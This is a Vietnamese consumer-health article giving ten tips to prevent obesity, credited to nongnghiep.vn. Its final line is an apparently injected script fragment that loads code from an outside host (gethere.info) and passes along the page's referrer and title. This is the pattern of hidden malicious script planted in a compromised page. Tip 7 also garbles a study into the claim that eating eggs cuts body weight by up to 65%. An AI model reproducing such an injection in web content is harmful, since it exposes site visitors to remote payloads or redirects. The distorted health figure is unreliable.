Chất lượng cuộc sống được nâng cao, thói quen sử dụng công nghệ giải trí hiện đại, lạm dụng thực phẩm, đồ uống ăn nhanh làm cho tỷ lệ béo phì phi mã kéo theo nhiều hệ lụy nan y.
10 kinh nghiệm phòng tránh tăng cân béo phì dưới đây được xem là đơn giản dễ thực hiện và có tác dụng thiết thực.
1. Giảm calo đầu vào
Theo nghiên cứu của Australia, tiêu chí quan trọng để giảm cân lâu dài là giảm lượng calo đầu vào. Để làm được điều này, người trong cuộc nên tư vấn bác sĩ, giới dinh dưỡng để duy trì một chế độ ăn hợp lý, cân bằng, đủ chất có hàm lượng calo rất thấp. Tuy nhiên, một chế độ ăn kiêng triệt để, calo quá thấp cũng có thể gây bất lợi cho sức khỏe, kể cả rủi ro hình thành sỏi mật.
2. Hãy dùng chất ngọt tự nhiên
Nghiên cứu cho thấy, hàm lượng đường có trong các món “ăn kiêng”, kể cả thực phẩm và đồ uống lại có xu hướng làm tăng tính háu ăn, tăng cảm giác thèm ăn, nhất là nhóm carbohydrate, có lượng calo rỗng, làm tăng tích mỡ. Nên thay chất ngọt nhân tạo bằng chất ngọt tự nhiên có trong trái cây, mật ong…, sẽ có lợi hơn.
3. Đánh lừa sự thèm ăn của cơ thể
Theo nghiên cứu của ĐH Cornell, công bố trên Tạp chí Consumer Research cho thấy, thủ thuật này có tác dụng giảm cân rất tốt như dùng đĩa, nhất là các loại đĩa màu xanh nhỏ đựng thức ăn, làm như vậy cơ thể có cảm giác no đủ hơn so với dùng đĩa lớn.
4. Kết bạn với người mảnh mai
Theo nghiên cứu công bố trên Tạp chí y học New England Journal of Medicine của Mỹ, béo phì mà kết bạn với người béo thì nguy cơ tăng cân nhanh hơn là so với kết bạn với người gầy, mảnh mai. Rất nhiều bí ẩn liên quan, nhưng việc ăn ít sẽ là động lực người béo giảm cân. Mối quan hệ này thực sự hữu ích cho những người trong cuộc.
5. Duy trì nhiệt độ nơi ở “khác thường”
Khi sống trong môi trường nhiệt độ hợp lý, cơ thể không cần phải làm việc để duy trì thân nhiệt, nên thụ động, “lười hơn”. Vì vậy, nên duy trì nhiệt độ hơi lạnh một chút vào mùa đông và ấm một chút trong mùa hè, buộc cơ thể phái hoạt hóa, đốt cháy nhiều calo và cuối cùng làm cho cơ thể giảm cân nhiều hơn.
6. Kiểm soát tính thèm ăn
Nghiên cứu cho thấy, những người bị trầm cảm có mức độ suy giảm hormone serotonin nên sẽ ăn nhiều. Ăn quá nhiều, nhất là carbohydrates (đơn và phức) là cách để cơ thể cân bằng serotonin. Nếu cảm thấy buồn kinh niên, nên đi khám, dùng thuốc để kiểm soát tính thèm ăn để giảm bệnh.
7. Tăng cường protein
Một nghiên cứu gần đây cho thấy, những người ăn trứng thay vì ăn bánh ngọt cho bữa ăn sáng sẽ có tác dụng giảm tới 65% trọng lượng và giảm được tới 34% đường kính vòng bụng.
8. Hạn chế dùng kháng sinh
Kháng sinh có thể được xem là công cụ giải cứu loài người khỏi nỗi ám ảnh bệnh tật, nhưng nên hạn chế, hoặc không dùng khi không cần thiết sẽ mang lại ích cao hơn. Một trong những hệ lụy do lạm dụng kháng sinh là gây tình trạng khuẩn kháng thuốc, làm cho bệnh tình thêm trầm trọng, triệt tiêu khuẩn thân thiện, làm tăng cân béo phì.
9. Kiểm tra những bất thường trên cổ
Nếu tăng cân không rõ nguyên nhân, thì rất có thể do lỗi tuyến giáp. Bệnh tuyến giáp có thể làm chậm quá trình trao đổi chất, dẫn đến tăng cân. Đây cũng là căn bệnh y học có thể kiểm soát, vì vậy nên đi khám và điều trị theo hướng dẫn của bác sĩ nội tiết.
10. Duy trì cuộc sống vận động
Ngoài ăn uống khoa học, kiêng khem, thì duy trì cuộc sống vận động, tăng cường luyện tập thể thao không chỉ giảm cân mà còn mang lại nhiều lợi ích khác. Đặc biệt là giảm béo phì, tăng cường vẻ đẹp ngoại hình, tốt cả cho sức khỏe thể chất lẫn tinh thần, và làm cho cuộc sống có thêm nhiều ý nghĩa….
Theo nongnghiep.vn
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;